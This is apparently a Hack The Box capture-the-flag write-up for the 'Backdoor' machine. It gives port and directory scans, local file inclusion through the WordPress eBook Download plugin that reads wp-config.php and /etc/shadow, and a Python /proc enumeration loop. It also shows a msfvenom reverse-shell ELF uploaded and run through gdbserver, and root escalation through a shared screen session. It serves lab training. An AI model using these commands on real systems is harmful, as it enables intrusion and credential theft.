BACKDOOR HTB
3 min readDec 13, 2021
Complementary write-up about the backdoor machine
Quick scan
$ nmap -p- --min-rate=1000 -T4 10.129.188.175
Deep scan
nmap -sS -A -sC -sV -p- --min-rate 5000 10.129.188.175Web Scan
└─$ gobuster dir -u http://10.129.188.175 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403" -z
Drill Down into wp-content folder
└─$ gobuster dir -u http://10.129.188.175/wp-content -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403
─$ searchsploit ebook wordpress
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
WordPress Plugin eBook Download 1.1 - Dire | php/webapps/39575.txt
WordPress Plugin Facebook Opengraph Meta 1 | php/webapps/17773.txt
WordPress Plugin Facebook Promotions 1.3.3 | php/webapps/17737.txt
WordPress Plugin Facebook Survey 1.0 - SQL | php/webapps/22853.txt
WordPress Plugin flash-album-gallery - 'fa | php/webapps/36383.txt
WordPress Plugin Nextend Facebook Connect | php/webapps/35439.txt
WordPress Plugin Spider Facebook - 'facebo | php/webapps/39300.txt
WordPress Theme Diary/Notebook Site5 - Ema | php/webapps/19862.pl
------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
http://10.129.193.79/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
scan the wp-includes folder
http://10.129.193.79/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-includes/comment.phphttp://10.129.193.79/wp-includes/
Trying LFI for passwd
http://10.129.193.79/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd─$ gobuster dir -u http://10.129.188.175 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403" -z
-z no debug
-s show only the status list
Trying LFI for shadow
http://10.129.193.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=file:///etc/shadowGetting the user group
http://10.129.193.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/groupLogin.Defs
http://10.129.193.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/login.defslist of available shell
#
http://10.129.193.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/shells
#
http://10.129.188.175/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/servicesProc Snipper Module to identify service using 1337 port
import requests
headers={"content-type":"text"}
for x in range(900,1000):
url = "http://10.129.188.175/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/"+str(x)+"/cmdline"
resp = requests.get(url,headers=headers)
leno=len(resp.text)
if (leno > 82):
if '1337' in resp.text:
print ("\033[93m*** Found *** \n %d %s",leno,resp.text)
else:
print ("\033[0m"+str(leno),resp.text)need to define the threashold before continue further
The gdbserver has been identified using port 1337
Working with GDB
$ gdb
gdb-peda$ target extended-remote 10.129.188.175:1337
gdb-peda$ remote put shell.elf shello.elf
Successfully sent file "shell.elf".
gdb-peda$ set remote exec-file shello.elf
gdb-peda$ r
## Handler
Search msfvenom for payload
$ msfvenom -l payload | grep linux/x64$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.136 LPORT=4444 -b "\x00\x20\x09\x0a" -a x64 --platform linux -f elf -o shell.elf
User shell received
Privilage Escalation
user@Backdoor:/home/user$ screen -ls root/
screen -ls root/
There is a suitable screen on:
1004.root (12/03/21 21:26:01) (Multi, detached)
1 Socket in /run/screen/S-root.
$ Export TERM=xterm
$ screen -x root/root